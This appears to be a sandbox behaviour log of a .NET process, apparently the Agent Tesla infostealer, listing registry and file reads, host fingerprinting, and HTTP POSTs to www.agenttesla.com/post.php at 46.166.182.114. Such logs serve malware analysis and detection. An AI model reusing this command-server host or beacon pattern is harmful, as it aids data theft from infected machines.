File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 237 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 559 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 9
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
System Get Network Adapter Info - False 1
Fn
System Get Network Adapter Info - True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Thread 0x5fc
5 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Thread 0x670
52 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn